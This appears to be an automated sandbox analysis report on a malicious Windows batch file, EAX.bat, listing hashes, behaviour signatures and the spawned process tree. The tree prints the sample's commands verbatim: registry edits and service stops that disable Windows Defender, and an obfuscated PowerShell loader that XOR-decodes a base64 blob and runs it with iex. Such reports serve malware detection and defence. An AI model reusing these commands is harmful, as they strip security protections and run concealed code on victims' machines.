Analysis

  • max time kernel
    140s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-05-2024 21:46

General

  • Target

    EAX.bat

  • Size

    13KB

  • MD5

    702ac05d7d2c6fcb005d0f072e7e1dee

  • SHA1

    0538b012778f133432a0778fdb540292b9f6ef94

  • SHA256

    d6df7159e2798c2e3a8d65c2a15d15bd85a9d4a73d1a196ba7bebc32113b20f9

  • SHA512

    e9179fc17d850c840df69a5580c016155cba2cfad099cac1b74037fb16b77156035b948f0eec1ee78c17e8153eab33135fe6ae0f6ded9813e972b7585845c796

  • SSDEEP

    384:+SopGvVZz6qws74S+ngzstcpshXrDUsDul0f6dniof5+tLohTleawO6jxi5Dm3u4:Ljmq97R+kpmDUXBK8w19mm3v

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 2 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\EAX.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1140
    • C:\Windows\system32\net.exe
      net session
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4696
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 session
        3⤵
          PID:3688
      • C:\Windows\system32\reg.exe
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
        2⤵
          PID:1196
        • C:\Windows\system32\reg.exe
          reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
          2⤵
          • Modifies Windows Defender Real-time Protection settings
          PID:4312
        • C:\Windows\system32\net.exe
          net stop WinDefend
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:3292
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 stop WinDefend
            3⤵
              PID:496
          • C:\Windows\system32\net.exe
            net start WinDefend
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:2420
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 start WinDefend
              3⤵
                PID:4584
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -NoExit -encodedCommand $ h e h e h e   =   " N C c 8 M S Y 7 P T x y H j 0 9 O S c i F C c 8 M X I p X 1 h y c n J y A j M g M z 9 y e n Y / P T Y n P j c c M z 8 3 f n J 2 N C c 8 M S Y 7 P T w c M z 8 3 e 1 9 Y c n J y c n Y z I S E 3 P 3 J v c n o J E y I i F j 0 / M z s 8 D 2 h o E S c g I D c 8 J h Y 9 P z M 7 P H w V N y Y T I S E 3 P z A + O z c h e n t y L l 9 Y c n J y c g U 6 N y A 3 f x 0 w O D c x J n I p c n Y N f B U + P T A z P h M h I T c / M D 4 r E T M x O j d y f x M 8 N n J 2 D X w e P T E z J j s 9 P H w B I j 4 7 J n p 1 D g 5 1 e w l / Y w 9 8 X 1 h y c n J y c h c j J z M + I X p 1 A S s h J j c / f D Y + P n V 7 X 1 h y c n J y c i 9 7 f B U 3 J g Y r I j d 6 d R 8 7 M S A 9 I T 0 0 J n w F O z x h Y H w H P C E z N D c c M y Y 7 J D c f N y Y 6 P T Y h d X t f W H J y c n J 2 J j 8 i b x J 6 e 1 9 Y c n J y c n Y z I S E 3 P 3 w V N y Y f N y Y 6 P T Y h e n t y L n I U P S A X M z E 6 f x 0 w O D c x J n I p G z R 6 d g 1 8 H D M / N 3 J / P j s 5 N 3 J w F T d 4 A n g 9 M X g 2 N i A 3 I S F w e 3 I p d i Y / I n l v d g 0 v L 1 9 Y c n J y c i A 3 J i c g P H J 2 J j 8 i C W I P f B s 8 J D 0 5 N 3 p 2 P C c + P n 5 y E n p 6 d j M h I T c / f B U 3 J h 8 3 J j o 9 N n p 1 F T c m H z 0 2 J z 4 3 G j M 8 N j 4 3 d X t 7 f B s 8 J D 0 5 N 3 p 2 P C c + P n 5 f W B J 6 d j 8 9 N i c + N x w z P z d 7 e 3 5 y d j Q n P D E m O z 0 8 H D M / N 3 t 7 X 1 g v X 1 h f W F 9 Y N C c 8 M S Y 7 P T x y N T c m F j c + N z U z J j c G K y I 3 c i l f W H J y c n I C M y A z P 3 J 6 X 1 h y c n J y c g k C M y A z P z c m N y B 6 A j 0 h O y Y 7 P T x y b 3 J i f n I f M z w 2 M y Y 9 I C t y b 3 J 2 B i A n N 3 s P c g k G K y I 3 C Q 8 P X 1 h y c n J y c n Y 0 J z w x f n I J A j M g M z 8 3 J j c g e g I 9 I T s m O z 0 8 c m 9 y Y 3 s P c g k G K y I 3 D 3 J 2 N j c + B i s i N 3 J v c g k E P T s 2 D 1 9 Y c n J y c n t f W H J y c n J 2 J i s i N 3 J v c g k T I i I W P T 8 z O z w P a G g R J y A g N z w m F j 0 / M z s 8 f F 9 Y c n J y c h Y 3 N D s 8 N x Y r P D M / O z E T I S E 3 P z A + K 3 p 6 H D c l f x 0 w O D c x J n I B K y E m N z 9 8 A D c 0 P j c x J j s 9 P H w T I S E 3 P z A + K x w z P z d 6 d Q A 3 N D 4 3 M S Y 3 N h Y 3 P j c 1 M y Y 3 d X t 7 f l 9 Y C Q E r I S Y 3 P 3 w A N z Q + N z E m O z 0 8 f B c / O y Z 8 E y E h N z 8 w P i s Q J z s + N j c g E z E x N y E h D 2 h o A C c 8 e 3 x f W H J y c n I W N z Q 7 P D c W K z w z P z s x H z 0 2 J z 4 3 e n U b P B 8 3 P z 0 g K x 8 9 N i c + N 3 V + c n Y 0 M z 4 h N 3 t 8 X 1 h y c n J y F j c 0 O z w 3 B i s i N 3 p 1 H y s W N z 4 3 N T M m N w Y r I j d 1 f n J 1 E T 4 z I S F + c g I n M D 4 7 M X 5 y A T c z P j c 2 f n I T P C E 7 E T 4 z I S F + X 1 h y c n J y E y c m P R E + M y E h d X 5 y C Q E r I S Y 3 P 3 w f J z 4 m O z E z I S Y W N z 4 3 N T M m N w 9 7 X 1 h f W H J y d i Y r I j d 8 X 1 h y c n J y F j c 0 O z w 3 E T 0 8 I S Y g J z E m P S B 6 d Q A G A S I 3 M T s z P h w z P z d + c h o 7 N j c Q K w E 7 N X 5 y A i c w P j s x d X 5 f W A k B K y E m N z 9 8 A D c 0 P j c x J j s 9 P H w R M z 4 + O z w 1 E T 0 8 J D c 8 J j s 9 P C E P a G g B J j M 8 N j M g N n 5 y d j Q n P D F 7 f F 9 Y c n J y c n I B N y Y b P y I + N z 8 3 P C Y z J j s 9 P B Q + M z U h e n U A J z w m O z 8 3 f n I f M z w z N T c 2 d X t f W F 9 Y c n J 2 J i s i N 3 x f W H J y c n I W N z Q 7 P D c f N y Y 6 P T Z 6 d R s 8 J D 0 5 N 3 V + c n U C J z A + O z F + c h o 7 N j c Q K w E 7 N X 5 y H D c l A T 4 9 J n 5 y B D s g J i c z P n V + c n Y 2 N z 4 G K y I 3 f l 9 Y d j Q n P D F 7 f H I B N y Y b P y I + N z 8 3 P C Y z J j s 9 P B Q + M z U h e n U A J z w m O z 8 3 f n I f M z w z N T c 2 d X t f W H J y c n I g N y Y n I D x y d i Y r I j d 8 E S A 3 M y Y 3 B i s i N 3 p 7 X 1 g v X 1 h f W F 9 Y C R s 8 J g I m I A 9 2 N C c 8 M R M 2 N i B y b 3 I e P T 0 5 J y I U J z w x c j M / I T t 8 N j 4 + c h M / I T s d I j c 8 A T c h I T s 9 P F 9 Y d j 0 + N g I g P S Y 3 M S Y 7 P T w Q J z Q 0 N y B y b 3 J i X 1 h 2 J C J v C Q E r I S Y 3 P 3 w A J z w m O z 8 3 f B s 8 J j c g P S I B N y A k O z E 3 I X w f M y A h O j M + D 2 h o F T c m F j c + N z U z J j c U P S A U J z w x J j s 9 P A I 9 O z w m N y B 6 e h 4 9 P T k n I h Q n P D F y O T c g P D c + Y W B 8 N j 4 + c g Q 7 I C Y n M z 4 C I D 0 m N z E m e 3 5 y e j U 3 J h Y 3 P j c 1 M y Y 3 B i s i N 3 I S e g k b P C Y C J i A P f n I J B x s 8 J m F g D 3 5 y C Q c b P C Z h Y A 9 + c g k H G z w m Y W A P f B 8 z O T c Q K w A 3 N A Y r I j d 6 e 3 t y e g k Q P T 0 + D 3 t 7 e 1 9 Y d i Q i f B s 8 J D 0 5 N 3 p 2 N C c 8 M R M 2 N i B + c m F + c m I q Z m J + c g k g N z Q P d j 0 + N g I g P S Y 3 M S Y 7 P T w Q J z Q 0 N y B 7 X 1 h 2 M C c 0 c m 9 y C R A r J j c J D w 9 y e m I q Z m p + Y i p h Y 3 5 i K j F r e 1 9 Y C Q E r I S Y 3 P 3 w A J z w m O z 8 3 f B s 8 J j c g P S I B N y A k O z E 3 I X w f M y A h O j M + D 2 h o E T 0 i K 3 p 2 M C c 0 f n J i f n J 2 N C c 8 M R M 2 N i B + c m F 7 X 1 g l N T c m c n A 6 J i Y i I W h 9 f T R m Z z E x N m N m f z E 2 Y T R / Z m V m M 3 9 q a m s 3 f z Y 3 Y z N i a 2 B n M W R h Y n 9 i Y n 8 5 I m U j M y U z M D 0 h J T N 8 I D s 5 N y B 8 I D c i P j s m f D Y 3 J H 0 A N z U 7 I S Y g M y Y 7 P T x 8 N y o 3 f n B y f x 1 y c B F o D g c h N y A h D n Y 3 P C R o B w E X A B w T H x c O E y I i F j M m M w 4 e P T E z P g 4 G N z 8 i D g A 3 N T s h J i A z J j s 9 P H w 3 K j d w X 1 g B J j M g J n 8 C I D 0 x N y E h c n 8 U O z 4 3 A j M m O n J w E W g O B y E 3 I C E O d j c 8 J G g H A R c A H B M f F w 4 T I i I W M y Y z D h 4 9 M T M + D g Y 3 P y I O A D c 1 O y E m I D M m O z 0 8 f D c q N 3 B y "  
 $ X o r _ V a l   =   8 2  
 $ x r   =   [ C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ h e h e h e )  
 $ f a f a f   =   $ x r   |   F o r E a c h - O b j e c t   {   r e t u r n   $ _   - b x o r   $ X o r _ V a l   }  
 $ d e c s c r   =   [ t e x t . e n c o d i n g ] : : u t f 8 . G e t S t r i n g ( $ f a f a f )  
 i e x   $ d e c s c r  
 
              2⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1896
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3792 --field-trial-handle=2356,i,13261194862334667799,7441241219475888176,262144 --variations-seed-version /prefetch:8
            1⤵
              PID:4024
            • C:\Windows\system32\AUDIODG.EXE
              C:\Windows\system32\AUDIODG.EXE 0x2f4 0x504
              1⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:2648

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xbwoippk.fgz.ps1

              Filesize

              60B

              MD5

              d17fe0a3f47be24a6453e9ef58c94641

              SHA1

              6ab83620379fc69f80c0242105ddffd7d98d5d9d

              SHA256

              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

              SHA512

              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            • memory/1896-0-0x00007FFFA4183000-0x00007FFFA4185000-memory.dmp

              Filesize

              8KB

            • memory/1896-10-0x00000216A2C40000-0x00000216A2C62000-memory.dmp

              Filesize

              136KB

            • memory/1896-11-0x00007FFFA4180000-0x00007FFFA4C41000-memory.dmp

              Filesize

              10.8MB

            • memory/1896-12-0x00000216A31B0000-0x00000216A31F4000-memory.dmp

              Filesize

              272KB

            • memory/1896-14-0x00007FFFA4183000-0x00007FFFA4185000-memory.dmp

              Filesize

              8KB

            • memory/1896-15-0x00007FFFA4180000-0x00007FFFA4C41000-memory.dmp

              Filesize

              10.8MB

            • memory/1896-16-0x00007FFFA4180000-0x00007FFFA4C41000-memory.dmp

              Filesize

              10.8MB